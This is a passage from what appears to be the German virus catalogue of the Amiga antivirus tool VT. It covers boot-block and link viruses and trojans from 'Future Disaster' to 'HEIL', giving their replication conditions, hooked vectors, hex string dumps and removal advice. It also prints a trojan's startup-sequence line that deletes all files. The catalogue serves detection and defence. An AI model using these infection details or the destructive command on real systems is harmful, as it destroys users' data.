VERSEUCHUNG eingetreten. Ich gehe aber davon aus, dass diese Fehler durch Updates behoben werden. Bis dahin sollten Sie vielleicht von einer schreibge- schuetzten Disk, die KEINE assigns auf die Festplatte hat, diese Antivirusprogramme booten. Nachtrag Jan. 99: Eine Lib, die von AntiVirPrg.en verwendet wird, ueberprueft sich inzwischen nach dem Laden auf Veraenderungen. WARNUNG WARNUNG WARNUNG WARNUNG WARNUNG - Future Disaster nur KS1.2, Cool, DoIo, BeginIo, immer ab $7FB00 fordert trackdisk.device (also HD nicht) Vermehrung:BB Schaden: sobald die Zaehlzelle den Wert 7 erreicht hat: - schreibt Speicherinhalt ab $10000 nach Block 0 u 1 - schreibt Speicherinhalt ab $7Fb00 nach Block 880 und weiter Folge: Disk unbrauchbar - G-Zus-Packer Laenge ungepackt: 15016 Bytes Wird in Docs als bester Packer angepriesen, aber: - das Original-File wird geloescht - ein neues File mit gleichem Namen und Erweiterung .god erzeugt - dieses neue File ist 30 Bytes lang und enthaelt nur: 0000: 54686973 49734d61 67696321 34434f1c ThisIsMagic!4CO. 0010: 27303811 10464b55 524e435b 4f470000 '08..FKURNC[OG.. Wenn Sie kein zweites Original-File haben, dann haben Sie Pech gehabt. Wenn Sie KEINEN Papierkorb auf ihrer WB haben (z.B. ich), dann haben Sie Pech gehabt. Ist zwar KEIN Virus, aber vielleicht wird jemand durch die Er- kennung vor Schaden bewahrt. Also ein ECHTES Zerstoerungstool, auch wenn einige selbsternannte Besserwisser, Ihnen etwas anderes erzaehlen wollen. Es ist KEIN Gag. Fundort z.B.: CD-Aminet5:AMINET/GAME/GAG/GZUS001.LZH - Gadaffi (KickRomV1.2 Floppymusik) Cool, DoIo, KickTag, KickCheckSum - Gandalf BB Cool, ExitIntr, PutMsg BB-Teile codiert mit eor.w d1,(a1)+ decodiert ist im Speicher zu lesen: Gandalf`s Rache usw. Vermehrung und Schaeden: - schreibt sich auf BB - in Abhaengigkeit von der Zaehlzelle soll die Disk zerstoert werden. Verwechselt aber Disk-Seek mit Disk-Format, DisplayBeep mit DisplayAlert usw. (Anfaenger ??) - GCA-Virus BB Forpib-Clone nur Text geaendert 26.11.92 4765726d 616e2043 7261636b 696e6720 German Cracking 4167656e 63792028 47434129 20212121 Agency (GCA) !!! 20a92031 39383820 56312e30 20212121 . 1988 V1.0 !!! - GENERALHUNTER (L) File Laenge ungepackt: 26112 Bytes Gibt vor ein Linkvirus-Tester zu sein. Empfehlung: Loeschen Im File wurde uncodiert folgender Text gefunden: 67616265 293a2025 730a0040 5349474e gabe): %s..@SIGN 554d0049 63682062 696e2064 65722042 UM.Ich bin der B 6f62626c 652d5369 676e756d 2d566972 obble-Signum-Vir 75732028 332e4765 6e657261 74696f6e us (3.Generation 290a0044 75206272 61756368 7374206d )..Du brauchst m 69636820 6e696368 74206d65 6872207a ich nicht mehr z 75206b6f 70696572 656e2c20 64656e6e u kopieren, denn 200a0064 61732068 61626520 69636820 ..das habe ich 6a65747a 74206175 63682073 63686f6e jetzt auch schon 2073656c 62657220 64726175 66212020 selber drauf! ;...... 4e753a00 1b631b5b 33336d47 454e4552 Nu:..c.[33mGENER 414c4855 4e544552 2050524f 46455353 ALHUNTER PROFESS 494f4e41 4c211b5b 33316d20 28432920 IONAL!.[31m (C) 31393930 2c39312c 39320a00 56657273 1990,91,92..Vers 696f6e20 332e322c 204de472 7a203139 ion 3.2, M.rz 19 39320a00 53756368 742c2065 726b656e 92..Sucht, erken - GENESTEALER BB auch KS2.04 immer ab $7EC00 Cool, DoIo Im BB ist zu lesen: GENESTEALER VIRUS!!! by someone... Schaeden und Vermehrung: ueber BB Testet VBlank ( cmpi.b #$32,$212(a6) ) Sollte der Wert NICHT 50 sein, so wird der Rootblock zerstoert. Fordert trackdisk.device NICHT . - GENETIC PROTECTOR V2.00 BB Dotty-Clone s.o. 16.03.92 nur Text geaendert: GENETIC-ELECTRONICS usw. Pech gehabt: wird weiterhin als Dotty erkannt - Germany-Virus Forpib-Clone nur Text geaendert 4765726d 616e7920 21204c6f 76652020 Germany ! Love 6974206f 72206c65 61766520 69742021 it or leave it ! 21212121 21212121 21212020 20202020 !!!!!!!!!! - Glasnost Block 0 bis 3, Laenge also 2048, KickTag, KickCheckSum im Prg noch DoIo, $6c, im Speicher immer $7F000 fordert trackdisk.device NICHT. Wird aktiv wenn Block 880 gelesen wird Schaeden: blockiert nach 15 oder 20 Min. Rechner schreibt eigenen BB und zerstoert damit auch Files in Block 2 u. 3 bestimmt einen Block ueber $DFF006 durch mulu #6,d7 und schreibt in diesen Block ab $100 vier Langworte ($11111111, $22222222, $44444444, $88888888). Dieser Block kann NICHT gerettet werden. Text in Block 3: Glasnost VIRUS by Gorba!! First release Clone: siehe bei FLASHBACK-Virus, TAI13, - GlobVec144-LVirus File Link Namensbegruendung: veraenderter Zeiger, da nichts Brauchbares im Linkteil Verbogene Vektoren: Cold, KickTag, AddTask, in der GlobVec-Tabelle der Wert an $144 Resetfest: ja Fileverlaengerung: 2440 Bytes Link hinter ersten Hunk. VT versucht den Process im Speicher abzuschalten. Lieber waere mir allerdings, wenn Sie von einer "sauberen" und schreibge- schuetzten Disk starten wuerden, da auch in den Segmentlisten der Processe Veraenderungen vorgenommen werden. VT versucht das Linkteil aus einem File auszubauen. Vermehrungsbedingungen: - File ausfuehrbar ($3F3) - kein Hunk_Name (4(File) muss 0 sein) - kein Hunk_Overlay ($c(File) muss 0 sein) - $14(File) = Hunklaenge hinter der Kennung ($3E9) Versucht Protection-Flags zu retten. Das Teil meldet sich nicht. Versucht im Speicher Process-Strukturen zu veraendern. In VT/Listen Resident taucht ein device auf: Vers 34 Pri -1 Name wechselt oder Name leer Hinweis: Ein Syquest-Medium war in kurzer Zeit unbrauchbar. Es sind auch defekte Files entstanden. Es scheinen auch Files zu ent- stehen, bei denen die Zahl im 1.Hunk groesser ist als das abge- speicherte File. VT sollte "1.Hunk > Filelaenge" ausgeben und Loeschen anbieten. Hinweis2: Aeltere VT-Ver. haetten das Teil finden sollen, wenn Sie in VTPrefs das Datum einschalten. Aeltere VT-Ver. haetten das Teil finden sollen, wenn Sie in VTPrefs die Pruefsumme einschalten. Dazu muessen Sie aber in "guten Zeiten" mit copy nach ram und wieder zurueck z.B. in C-Dir fuer ein einheitliches Datum gesorgt haben. Oder Sie muessen mit VT Pruefsummen ge- bildet haben. Hinweis3: Falls Ihre Festplatte stark verseucht ist, gehen Sie bitte in Sp-File-Sp und testen Sie einzelne SubDir (DirFTest). Hinweis4: RDB Formatter 2 Virus Mit diesem Namen erkennt ein anderes Antivirusprogramm Files, die vom GlobVec144-LVirus veraendert wurden. NUR !!!! Der GlobVec144-LVirus enthaelt KEINE Rigid-Format-Routine !!!!! - Golden Rider Linkvirus im Speicher immer $7C000 verbiegt Cool, DoIo, DosOpen Arbeitet nicht mehr mit Doslib-Version 35 oder hoeher. Verlaengert ein File um 868 Bytes, haengt sich auch mehrmals in ein File, da keine Abfrage ob schon befallen. File darf max 100000 Bytes gross sein. File muss executable sein. Filename + Pfad darf nur Zeichen ab A enthalten (Ausnahme / : 1 0 ) Eine Zeichenobergrenze wurde im Programm nicht gefunden. Eine Vermehrung findet statt bei: df0:Test/File KEINE Vermehrung mit: df3:Test/F9 Das VirusTeil enthaelt keine Melderoutinen. Haengt sich am Ende des 1.Hunks ein und ersetzt RTS durch ein NOP. Sollte kein RTS am Ende des 1. Hunks gefunden wer- den, so wird $38 Schritte ab Hunkende zurueck nach einem RTS gesucht und dann durch BRA.s ersetzt. In ersten Hunk des befallenen Files ist unverschluesselt zu lesen: >>> Golden Rider <<< by ABT VT versucht den Virusteil auszubauen und ein lauffaehiges Ursprungsprogramm abzuspeichern. KEINE Garantie !!! Arbeiten Sie mit einer Kopie !!!! Vermehrung getestet: ja Ausbau getestet: ja Hinweis: Da sich die 3 Testlangworte in 2 verschiedenen Bloecken befinden koennen, wird der Golden Rider nur im Filetest SICHER erkannt. Bei der Blockkette koennte einer beim Test NICHT ge- meldet werden. Hinweis 31.08.92: Ab VT2.44 sollten mehrere GoldenRider-Links ans gleiche File in einem Durchgang ausgebaut werden. Falls nein, melden Sie sich bitte. Danke - Gotcha LAMER Filevirus anderer Name: Lamer Bomb verlaengert File um 372 Bytes, DoIo nur in Files dir, run, cd, execute Schaeden: - KEINE Vermehrung ueber obengenannte Files hinaus - KopfStep - DisplayAlert u. RESET: "HAHAHE... Gotcha LAMER!!!" Ursprungsprogramm: MINIDEMO.EXE Laenge: 773 Bytes sucht fuer Link nach: dh0:c/dir, dh0:c/run, dh0:c/cd, dh0:c/execute - GoTcHa-Trojan Filenamenveraenderung Anderer moeglicher Name: UNLZX-Trojan Bekannter Filename: unlzx Laenge: 37400 Bytes Keine verbogenen Vektoren Nicht resetfest Im File ist zu lesen: 54634861 21000000 000c7379 733a632f TcHa!.....sys:c/ 6c6f6164 77620000 000d7379 733a632f loadwb....sys:c/ 6c6f6164 77622000 0000000e 7379733a loadwb .....sys: 632f7365 74706174 63680000 00107379 c/setpatch....sy 733a632f 73657470 61746368 20200000 s:c/setpatch .. 000d7379 733a632f 6d616b65 64697200 ..sys:c/makedir. 0000000f 7379733a 632f6d61 6b656469 ....sys:c/makedi 72202000 0000000c 20202020 20476f54 r ..... GoT 63486121 00000000 00000000 00000017 cHa!............ 20207748 59206449 4420794f 55207255 wHY dID yOU rU 4e206d45 203f2100 00000000 00000011 N mE ?!......... 20202020 20202020 6e4f5720 49277645 nOW I'vE 20000000 00000000 00102020 20202020 ......... 20202047 6f546348 6121 GoTcHa! Schaden: Die Filenamen loadwb, makedir und setpatch werden um Leer- zeichen ergaenzt (siehe oben). Nach dem naechsten Reset kann also die startup-sequence nicht mehr abgearbeitet werden. Veraenderungen IN den Files wurden NICHT festge- stellt. Mit etwas Glueck erkennt VT auch diese Files. Vorsicht: Es koennte zu Fehlerkennungen kommen, wenn auch Programmierer mit diesen namen UND Leerzeichen arbeiten. Nach dem Rename erscheint ein Fenster mit dem Text "wHY dID .... usw. . Wenn Sie das Fenster schliessen, wird ein Reset ausge- loest. Das Teil MUSS also auffallen. Aendern Sie die drei File- namen mit SID oder einem anderen DirUtil einfach zurueck. VT bietet fuer das UNLZX nur loeschen an, da die unlzx- Funktion NICHT erfuellt wird. - GoTcHa-2-Trojan Filenamenveraenderung Anderer moeglicher Name: devilcheck-Trojan Bekannter Filename: dd-devilcheck Laenge: 32376 Bytes Keine verbogenen Vektoren Nicht resetfest Im File ist zu lesen: 20202020 20202047 6f546348 61212049 GoTcHa! I 49000000 00000000 00000000 001b2020 I............. 20202020 77485920 64494420 794f5520 wHY dID yOU 72554e20 6d45203f 21000000 00000000 rUN mE ?!....... 00152020 20202020 20202020 20206e4f .. nO 57204927 76452000 00000000 00000013 W I'vE ......... 20202020 20202020 20202020 20476f54 GoT 63486100 00000000 00000015 20202020 cHa......... 20202020 20202020 20416761 696e2021 Again ! 21000000 000c5359 533a632f 6c6f6164 !.....SYS:c/load 77620000 000d5359 533a432f 6c6f6164 wb....SYS:C/load 77622000 0000000e 5359533a 632f5365 wb .....SYS:c/Se 74706174 63680000 00105359 533a432f tpatch....SYS:C/ 53657470 61746368 20200000 000d5359 Setpatch ....SY 533a632f 6d616b65 64697200 00000010 S:c/makedir..... 5359533a 432f6d61 6b656469 72202020 SYS:C/makedir 0000000b 5359533a 632f5374 61636b00 ....SYS:c/Stack. 0000000a 5359533a 432f4861 434b0000 ....SYS:C/HaCK.. 000a5359 533a632f 74797065 0000000a ..SYS:c/type.... 7379733a 632f4879 70658054 0000 sys:c/Hype.T.. Schaden: Die Filenamen loadwb, makedir und setpatch werden um Leer- zeichen ergaenzt (siehe oben). Stack und type werden um- benannt (s.o.). Nach dem naechsten Reset kann also die startup-sequence nicht mehr abgearbeitet werden. Veraenderungen IN den Files wurden NICHT festgestellt. Mit etwas Glueck erkennt VT auch diese Files. Vorsicht: Es koennte zu Fehlerkennungen kommen, wenn auch Programmierer mit diesen namen UND Leerzeichen arbeiten. Nach dem Rename erscheint ein Fenster mit dem Text "wHY dID .... usw. . Wenn Sie das Fenster schliessen, wird ein Reset ausge- loest. Das Teil MUSS also auffallen. Aendern Sie die fuenf File- namen mit SID oder einem anderen DirUtil einfach zurueck. VT bietet nur loeschen an. Unterschied zu GoTcHa: zwei Filenamen mehr - Graffiti BB aehnlich 16Bit Crew + 3D-Graphik FastMem ja, Cool, im Prg DoIo, im Speicher immer $7ec00 Vermehrung: ueber BB Graphikroutine mit 3D unverschluesselt im BB: VIRUS! written by Graffiti - GREMLIN BB Cool, KickSumData, im Prg. DoIo, im Speicher immer $7f400 Fordert trackdisk.device NICHT !! Vermehrung: ueber BB Textausgabe mit GraphikRoutine: roter Hintergrund, weisse Schrift GREMLIN - Gremlins-BB Fehlerquelle Stand: Anfang April 94 Bei aktivem Mount.BB-Virus (s.u.) erkennen einige Antivirus- programme "Gremlins-Virus" und versuchen die Original-Vektoren wieder zu setzen. Da die Vektorensicherung beim Mount.BB-Virus an einer anderen Stelle stattfindet, verursachen diese Prg.e einen Systemabsturz. Den Virus im BB erkennen diese Prg.e nicht. Ich nehme an, dass der Fehler in den entsprechenden Programmen beim naechsten Update (Mai 94 ?) behoben wird. VT erkennt bis einschliesslich VT2.62 "unbekanntes Programm" im Speicher. Sie koennen mit Tools/setze OVek. das Virusteil im Speicher OHNE Systemabsturz abschalten !! Ab VT2.63 (04.94) wird das neue Virusteil mit Namen (s.u.) er- kannt. - GRIM-REAPER-Virus BB Disk-Doktors-Clone siehe oben Text geaendert: 646f732e 6c696272 61727900 0000636c dos.library...cl 6970626f 6172642e 64657669 63650000 ipboard.device.. 00010400 00000097 20546865 20475249 ........ The GRI 4d2d5245 41504552 20627920 48616e6e M-REAPER by Hann 6962616c 21202020 20200000 00000000 ibal! ...... - GVP-HardDiskSpeeder-Trojan andere moegliche Namen: DiskSpeeder-Trojan Karacic-Trojan siehe dort - GX.TEAM Fastmem ja, nur KS1.2 da absoluter DoIo-Einsprung Cool, DoIo, KickTag, KickCheckSum, im Speicher immer ab $7f4d0 Vermehrung: ueber BB Textanzeige mit displayAlert (wird mit sub.b #$41,d0 nach $7f300 entschluesselt): Mais qui voila ???C'est le nouveau VIRUS de GX.TEAM !! AAAHH! Les salauds! Les ...(Insultes diverses) He!He! SILENCE : GX.TEAM entre enfin dans la legende ... BYE!!! - GYROS Cool, DoIo, immer ab $7EC00 Fordert trackdisk.device NICHT Vermehrung:BB Schaden: Sobald die Zaehlzelle den Wert 10 erreicht hat: - blockiert Rechner Im BB zu lesen: Your Amiga is fucked from a nice GYROS usw. - GYROS-SOFIA-Clone: Nur Text geaendert. Das Teil stammt nie und nimmer aus Sofia. 206f6e65 7320534f 46494120 abababab ones SOFIA .... - GYROS-SOFIA-Inst. gepackt: 1524 Bytes entpackt: 1952 Bytes Ein 3c(a7)-Link File (s.o.), das einen GYROS-SOFIA.BB im Speicher verankern soll. Das Teil war an 2.MZaus (richtig, das Original-Programm liegt auf der VT-Disk im Unterver- zeichnis Utility) gelinkt. VT bietet nur loeschen an. Ein Ausbau lohnt nicht. Da bei der Verankerung im Speicher, absolute Speicheradressen, die bei vielen Rechnern nicht belegt sind, verwendet werden, erscheint haeufig der GURU. - HACKERS siehe bei SHIT Unter diesem Namen wurde mir ein BB zugeschickt. Aber auch im Speicher war dieser Name nicht nachvollziehbar. - HANF-LVirus Linkvirus Namensbegruendung: Am Anfang des ersten Hunks ist zu lesen: 600c4e75 48414e46 00000fb8 4e7648e7 `.NuHANF....NvH. Fileverlaengerung: #5472 Bytes Nicht Resetfest Verbogener Vektoren: - $F0(TimerBase) - $6c-Proc z.B. DF0, DF1 usw. (gesucht wird ueber DosBase, ROOT, Info usw.) - BeginIo von verschiedenen Ser.-Devs Decodiert ist im LinkTeil zu lesen: 4e5d4cdf 7fff6000 064e6172 74736572 N]L..`..Nartser 00426175 6442616e 64697400 62736369 .BaudBandit.bsci 73646e00 636f6d70 6f727473 00647561 sdn.comports.dua 72740065 6d707365 7200656e 766f7973 rt.empser.envoys 65726961 6c006776 70736572 00686967 erial.gvpser.hig 68737065 65640069 626d7365 72006e65 hspeed.ibmser.ne 74736572 006e6577 73657200 73657269 tser.newser.seri 616c0073 696f7362 72007371 75697272 al.siosbr.squirr 656c7365 7269616c 0074656c 73657200 elserial.telser. 55535253 65726961 6c007577 00763334 USRSerial.uw.v34 73657269 616c0000 2e646576 69636500 serial...device. Speicherverankerung: - Test ob schon im Speicher (HANF) - das Teil codiert sich im Speicher immer neu mit $DFF006 (das gabs bis jetzt noch nicht) Linkvorgang: - File noch nicht verseucht (HANF) - Kein RTS an 2(CodeHunk) also keine Libs usw. - File ausfuehrbar ($3F3) - Letzter Hunk des Files ist Code oder Data - 1.Hunk mind. $3A gross - Ein kurzes Stueck des Virusteil ueberschreibt den Anfang des ersten Hunks - Der Haupt-Virusteil wird hinter den letzten Code- oder Datahunk gelinkt - das Teil codiert sich immer neu mit $DFF006 beim Linkvorgang - Bei Tests sind auch defekte Files entstanden Schaeden: - Wahrscheinlich mit BeginIo Ser.-Devs (Hab ich nicht ausgetestet, da ich keines dieser Devices verwende (vectorser)) VT versucht die Vektoren im Speicher zurueckzusetzen. Fuer sinnvoller halte ich allerdings den Neustart von einer sauberen Antivirusdisk, da mein System mit dem Virusteil nicht sehr stabil war. VT versucht den Linkausbau bei einem ausfuehrbaren File. - HAPPY NEW YEAR BB 21.11.92 Cool, im Programm DoIo immer ab $7EC00 Namensbegruendung: im BB ist zu lesen: 2d2b2d20 48415050 59204e45 57205945 -+- HAPPY NEW YE 4152202d 2b2d4ef9 0fc00000 43f90007 AR -+-N.....C... Vermehrung: kaum moeglich Begruendung: endlich hat es jemand geschafft, einen HunkReloc32 im BB unterzubringen. 000003ec ................ 00000006 00000000 000000e4 000000dc ................ 000000bc 0000006e 0000003e 00000022 .......n...>..." 00000000 000003f2 00000000 00000000 ................ Dies hat zur Folge, dass der OrigDoIo an einer Stelle abgelegt wird, und sobald er gebraucht wird, an einer ganz anderen Stelle im BB gesucht wird. Die Folgen sind klar. Meine Empfehlung: Anfaenger uebt weiter am Joystick. Glaubt mir, da ist euer Erfolgserlebnis groesser. - HappyNewY.96 Inst. Installer Typ A Bekannte Files: DE-TAG V0.63a 35712 Bytes (ein BBS-Utility-Prg) DemoManiac V2.19 132352 Bytes (ein DemoMaker ???) VT bietet Loeschen an. - HappyNewY.96 Inst. Installer Typ B Bekannte Filenamen: - stoer4.exe Laenge: 57644 Bytes - mfs-format Laenge: 16448 Bytes VT2.79 muesste im Speicher den HappyNewYear finden, beim Filetest aber sich NICHT melden. Das koennte dann das fehlende Installerfile sein. Danke Ab VT2.80 sollte auch Typ B beim Filetest gefunden werden. Hinweis 16.05.96: Es ist ein File aufgetaucht. Name: stoer4.exe Laenge: 57644 Bytes Dieses File wurde nach der 4EB9-Methode erstellt. In diesem File wird mit dem VT-BlockKetteTest ein HNY96 gefunden. An die entsprechende Stelle im File kann sich das Virusteil NICHT SELBST gelinkt haben. Es hat also jemand nachgeholfen. Ab VT2.84 sollte das Teil auch beim Filetest erkannt werden. VT bietet nur Loeschen an. Zwei Lehren: - 4EB9-Files sind HAEUFIG harmlos, ABER NICHT IMMER. - Versuchen Sie zur Sicherheit auf Disketten oder RAD: auch den BlockITest und den BlockKetteTest mit VT. Danke Hinweis 96-10-05: Es ist ein File aufgetaucht. Name: mfs-format ??? Laenge: 16448 Bytes In diesem File wird mit dem VT-BlockKetteTest ein HNY96 im 3.Hunk (!!!) gefunden. An die entsprechende Stelle im File kann sich das Virusteil NICHT SELBST gelinkt haben. Es hat also jemand nachgeholfen. Ab VT2.91 sollte das Teil auch beim Filetest erkannt werden. VT bietet nur Loeschen an. - HappyNewY.96 Inst. Installer Typ C Hinweis 97-08-31: Es ist ein neues File aufgetaucht. Filename: - Mui_Patch Laenge: 2696 Bytes Nach readme: Patch MUI 020+ version ... Decodiert ist zu lesen: 62726172 79003c3e 20754e48 61505059 brary.<> uNHaPPY 204e6561 52204e65 57205965 61522053 NeaR NeW YeaR S 754d4d65 52202739 37203c3e 00228d58 uMMeR '97 <>.".X Entgegen des Textes handelt es sich aber nicht um HNY97, sondern um einen UNBRAUCHBAREN HNY96-Clone, da LoadSeg verbogen wird. Um eine Erkennung mit alten Antivirusroutinen zu verhindern, hat der Programmierer einige Bytes geaendert. Sein Pech - unser Glueck Jeder LoadSeg-Aufruf fuehrt IMMER zum GURU. Was ein Loeschen von 2 Bytes (do) so alles ausmacht. VT bietet nur Loeschen an. - HNY96-BBSIntro-Inst Installer Archivname: CBS-ETIT.LZX Filename: Eternity.exe 26736 Bytes Nach File-ID: BBSIntro for ETERNiTY Das HNY96-Teil haengt am 11. Hunk (!!!!). Da muss wohl jemand nachgeholfen haben. VT bietet nur Loeschen an. - HappyNewY.96-Fucked File NICHT vermehrungsfaehig bekannter Filename: Idefix Laenge: #27628 Bytes mit VT-vergleiche koennen Sie feststellen: HNY96-Org HNY96-fucked 48e7fffe 2c780004 H...,x.. : 48e74e75 2c780004 H.Nu,x.. ^^^^ ^^^^ 43fa01ee 337c4e75 C...3.Nu : 43fa01f0 337c4e75 C...3|Nu fe087025 4eaefdd8 ..p%N... : fe087025 4eaefdd8 ..p%N... ;..... 646f732e 6c696272 dos.libr : 4e71646f 732e6c69 Nqdos.li ^^^^^^^^ ^^^^^^^^^ 61727900 3c3e2048 ary.<> H : 62726172 79003c3e brary.<> 61707079 204e6577 appy New : 20467563 6b656420 Fucked 20596561 72203936 Year 96 : 55702059 65617220 Up Year 21203c3e 000003f2 ! <>.... : 39382120 000003f2 98! .... Der Anfaenger-Programmierer (besser im Sandkasten spielen) hat die dos.lib um 2 Bytes verschoben. Er hat dabei ueber- sehen, dass von dieser Stelle rueckwaerts das Virusteil ein RTS (4e75) im Code setzt. Im richtigen HNY96 wird dann zeitweise 48e7 ueberschrieben und bei Bedarf wieder zurueck- gesetzt. Dieses unbrauchbare Teil dagegen ueberschreibt fffe. - HappyNewY.96-LVirus File Link vgl. auch xcom-LVirus Typ A und Typ B ab KS2.04: ja (Versionsabfrage auf mind. #37) Namensbegruendung: im Linkteil ist uncodiert zu lesen: 61727900 3c3e2048 61707079 204e6577 ary.<> Happy New 20596561 72203936 21203c3e 000003f2 Year 96! <>.... Verbogener Vektor: LoadSeg Resetfest: Nein Fileverlaengerung: 540 Bytes Link hinter den ersten Hunk. VT versucht Loadseg im Speicher zurueckzusetzen. VT versucht den Linkteil aus einem File auszubauen. Vermehrungsbedingungen: - File ist noch nicht verseucht (1 LW-Test) - Filename enthaelt nicht ".l" oder "-" - max. Filelaenge #124000 Bytes - min. Filelaenge #2400 Bytes - 3E9-Hunk wird gefunden - Disk validated - mind. 4 Block frei - RTS wird gefunden ( max. loop $3F ) - RTS wird ersetzt durch bra.s oder NOP Ueberspringt 3E8,3F0,3F1-Hunks usw. !!!!! Das Teil meldet sich nicht. Hinweis: Falls Ihre HD sehr verseucht ist, dann beginnen Sie bitte mit dem C-Verz. (File-Speicher-File). Das haeufige Neueinlesen wird dadurch geringer. Hinweis Dez.95: Es ist ein File rj_gs10.exe mit der Laenge 16888 Bytes aufge- taucht. Es handelt sich um ein Archiv (selbstentpackend Lh.SFX), das angeblich BBS-Utilities enthaelt. Entpacken Sie das Archiv im Filerequester von VT (Sp-File-Sp) und Sie werden danach ein HNY96 verseuchtes File finden. Hinweis 19.04.96 nach Telephonanruf: Der Hintergrundchecker in VT findet immer wieder den HappyNew- Year96 im Speicher. Nach dem Loeschen im Speicher taucht er NICHT mehr auf bis zum NAECHSTEN Reset. Der Filetest mit VT und anderen Antivirusprogrammen verlaeuft immer negativ. Loesung: In den Rigid-Bereich wurde ein FastFileSystem eingespielt, das mit dem HNY96 verseucht war. Alle Filetests MUSSTEN deshalb negativ verlaufen. Untersuchen Sie deshalb bitte ab und zu auch mit VT den Rigid-Bereich Ihrer Festplatte. - z.Zyl - phys. 0 - gewuenschte Festplatte - mit Cursortastem BIS ZUM ENDE des Rigid-Bereichs durch- blaettern. Ich bedanke mich bei dem genervten User, der Zeit UND auch VIEL Geld (Fernzone) geopfert hat, bis wir gemeinsam die Loesung gefunden haben. Dieser Vorgang ist AUCH auf ANDERE Viren anwendbar !!!!! - HappyNewY.96-Opt-Vir. File Link Fileverlaengerung: 528 Bytes 68000: GURU, da Abfrage ob File schon verseucht, auf ungerader Adresse. Einige Befehle wurden veraendert. Rest siehe oben bei HNY96 - HNY96-rj_gs10-LHSFX ein selbstentpackendes Archiv mit HNY96, der aber NICHT automatisch gestartet wird nach dem Entpacken !!!! Laenge: 16888 Bytes oder 16404 Sie haetten das Teil auch gefunden mit: VT/Prefs/Seite2/entpacke FileArchive nach RAD: VT haette das Teil nach RAD: entpackt und danach beim Test der RAD: Das Virusteil gefunden. Da aber die Entpackfunktion wahrscheinlich nicht immer eingeschaltet wird, habe ich ver- sucht zusaetzliche Sicherheit zu schaffen. - HappyNewY.97-LVirus File Link ab KS2.04: ja (Versionsabfrage auf mind. #37) Namensbegruendung: im Linkteil ist uncodiert zu lesen: 4a1866f4 61184cdf 7fff4e75 48617070 J.f.a.L..NuHapp 79204e65 77205965 61722039 37212c6d y New Year 97!,m Verbogener Vektor: FilePart Veraenderter Vektor: LastAlert $80000FFE Resetfest: Nein Fileverlaengerung: 628 Bytes Link hinter den ersten Hunk. VT versucht FilePart im Speicher zurueckzusetzen. VT versucht den Linkteil aus einem File auszubauen. Vermehrungsbedingungen: - File ausfuehrbar ($3F3) - 3E9 wird mit Schleife gefunden - File ist noch nicht verseucht HNY96 oder HNY97 - Filename enthaelt nicht "." oder "-" - max. Filelaenge #150000 Bytes - min. Filelaenge #2000 Bytes - Disk validated - Medium hat mind. #4000 Blocks (also keine Disk) - versucht FileDate zu retten - RTS wird gefunden ( max. loop $3F ) - RTS wird ersetzt durch bra.s oder NOP Ueberspringt 3E8,3F0,3F1-Hunks usw. !!!!! Das Teil meldet sich nicht. Hinweis: Falls Ihre HD sehr verseucht ist, dann beginnen Sie bitte mit dem C-Verz. (File-Speicher-File). Das haeufige Neueinlesen wird dadurch geringer. - HappyNewY.98 Virus BB und File-Link ab KS2.04: ja (Versionsabfrage auf mind. #37) Namensbegruendung: im Linkteil ist uncodiert zu lesen: 74756974 646f732e 6c696272 61727900 tuitdos.library. 3c3e2048 61707079 204e6577 20596561 <> Happy New Yea 72203938 203c3e00 000a0000 00000000 r 98 <>......... Verbogene Vektoren: LoadSeg und DoIo Resetfest: Nein Cache-Problem: Ja Fileverlaengerung: #920 Bytes Link hinter den ersten Hunk oder als Bootblock VT versucht Loadseg und DoIo im Speicher zurueckzusetzen. VT versucht den Linkteil aus einem File auszubauen. Schreiben Sie mit Install einen neuen BB. Vermehrungsbedingungen fuer BB: - Block 0 wird vom User mit DoIo gelesen - DOS0 oder 1 mit expansion.lib (Pruefsumme) wird gefunden - Fehler: nach meiner Meinung fehlt der Update-Befehl - Fordert trackdisk.device NICHT !!!! Vermehrungsbedingungen fuer File-Link: - File ist noch nicht verseucht (98-Test) - max. Filelaenge #600000 Bytes - min. Filelaenge #2800 Bytes - 3E9-Hunk wird mit Schleife gefunden - Disk validated - mind. 4 Block frei - RTS wird gefunden ( max. loop $3F ) - RTS wird ersetzt durch bra.s oder NOP (wenn RTS genau am Ende des 1.Hunks war) Ueberspringt 3E8,3F0,3F1-Hunks usw. !!!!! Das Teil meldet sich nicht. Hinweis: Es sind bei Tests auch defekte Files entstanden. Hinweis2: Bitte fertigen Sie fuer VT unbedingt eine Bootdisk. Danke - HARDEX VIRUS Disk-Val. SADDAM-Clone s.u. - HardSpeeder File s.o. bei FileGhost - HardSpeeder2 File s.o. bei FileGhost2 - Hauke BB Byte-BanditClone s.o. Text geaendert: Hauke Jean Marc usw. - Haukeexterminator I BB Disk-DoctorClone s.o. Text geaendert: Haukeexterminator I usw. - HD-SPEEDUP-Instal. File Laenge gepackt: 6376 Bytes Laenge entpackt: 6252 Bytes KEINE verbogenen Vektoren Das File kann SICH SELBST NICHT vermehren. Laut Doc. soll es sich um einen Festplattenbeschleuniger handeln. Im entpackten File ist zu lesen: 00007379 733a732f 73746172 7475702d ..sys:s/startup- 73657175 656e6365 00007379 733a732f sequence..sys:s/ 48647370 65656475 702e7072 65667300 Hdspeedup.prefs. 7379733a 732f7761 69740000 7379733a sys:s/wait..sys: 732f4864 73706565 6475702e 70726566 s/Hdspeedup.pref 7320233f 2f233f0a 7379733a 732f7761 s #?/#?.sys:s/wa 69742031 3030300a 000003f3 00000000 it 1000......... ;....... 756d6265 720a0000 000003f2 434f4e3a umber.......CON: 302f302f 3634302f 3130302f 48442053 0/0/640/100/HD S 50454544 55502056 312e3000 00000000 PEEDUP V1.0..... Ablauf: Im File sind zwei Files enthalten. Diese werden nach sys:s geschrieben. -wait (ungepackt) Ein Befehl, der auch im C-Verzeichnis vor- kommt. -Hdspeedup.prefs gepackt: 4192 ungepackt: 6124 Ein Befehl, der mit dem Namen delete auch im C-Verzeichnis vorkommt. Die startup-sequence wird neu geschrieben. Laenge bei mir immer #44 Bytes. Inhalt: sys:s/Hdspeedup.prefs #?/#? sys:s/wait 1000 Die Original-Startup geht also verloren. Bitte denken Sie ueber eine Kopie Ihrer startup-sequence mit anderem Namen in s nach. Laut Doc. soll ein Reset danach ausgefuehrt werden. Durch die startup-seq. wuerde dann die Loeschfunktion aufgerufen. Falls VT dieses Teil findet: - loeschen Sie bitte auch: sys:s/wait sys:s/Hdspeedup.prefs sys:s/startup-sequence - HDprotect-Trojan Zerstoerung siehe bei LURAD-Trojan - HEIL Virus BB Cool immer $7C070 immer ab $7C000 Bei mir mit KS2.04 nach Reset kein neuboot von Disk. Unter KS1.3 